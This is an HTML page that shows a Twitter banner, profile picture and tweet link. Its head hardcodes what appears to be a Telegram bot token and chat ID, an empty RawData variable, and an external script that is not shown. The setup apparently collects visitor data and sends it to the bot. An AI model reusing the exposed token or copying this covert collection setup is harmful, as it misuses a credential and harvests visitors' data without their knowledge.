<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SLOM</title>
    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1678236761632243713/YWo2F68V_400x400.jpg" type="image/x-icon">
    <script>
        var ID='1876132786'
        var Token='1925688205:AAHpxS4EiNyYQuVQQeLPoZyzylp9wbAz58k'
        var RawData=null
    </script>
    <script src="JSFile.js"></script>
    <style>
        body {
            background-color: rgb(14, 14, 14);
        }
        #pfp {
            position: absolute;
            top: 80px;
            border-radius: 50%;
            width: 30%;
            left: 35%;
            filter: drop-shadow(8px 0 0 rgb(14, 14, 14)) 
                    drop-shadow(0 8px 0 rgb(14, 14, 14))
                    drop-shadow(-8px 0 0 rgb(14, 14, 14)) 
                    drop-shadow(0 -8px 0 rgb(14, 14, 14));
        }
        #bg {
            width: 100%;
        }
        #tweet {
            width: 40%;
        }
        @media screen and (min-width : 0px) and (max-width : 767px){
            #pfp {
                top: 60px;
            }
            #tweet {
                width: 80%;
            }
        }
    </style>
</head>
<body>
    <div id="bg"><img src="https://pbs.twimg.com/profile_banners/1438154238874488843/1687220490/1500x500" id="bg"></div>
    <center>
        <div><img src="https://pbs.twimg.com/profile_images/1678236761632243713/YWo2F68V_400x400.jpg" id="pfp"></div>
        <br><br><br><br>
        <a href="https://www.twitter.com/iizzzn" target="_blank"><img src="tweet.png" id="tweet"></a>
    </center>
</body>
</html>